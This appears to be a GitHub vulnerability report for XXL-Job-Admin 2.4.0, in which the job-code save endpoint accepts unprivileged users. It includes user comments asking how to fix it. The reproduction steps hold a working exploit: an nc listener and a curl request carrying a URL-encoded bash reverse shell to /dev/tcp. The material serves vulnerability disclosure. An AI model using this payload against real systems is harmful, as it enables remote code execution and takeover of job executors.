75ACOL
commented
10 months ago Create an unprivileged user and get its cookie, which I don't think is easy for attackers.
Open N0th1n3 opened 11 months ago
75ACOL
commented
10 months ago Create an unprivileged user and get its cookie, which I don't think is easy for attackers.
N0th1n3
commented
10 months ago Agree. The assumption of the attack is that you gained an unprivileged account.
xiemeng9462
commented
9 months ago 所以这个漏洞该怎么修复呢
liuyucheng182
commented
8 months ago 同问,这个漏洞该如何修复呢。
Environment
MySQL 5.7.44, XXL-Job-Admin 2.4.0 Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin) Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)
Vulnerability Information
It was found that the /xxl-job-admin/jobcode/save does not validate user privilege. The modification of code in running cronjob for job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure OR reverse shell) on the job executor.
Steps to reproduce the behavior
Step 1: Create a listener
nc -nlvp 8888Step 2: Create a unprivileged user and get its cookie
Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"Step 4. Trigger the cronjob/wait until cronjob executes. A reverse shell will be executed.
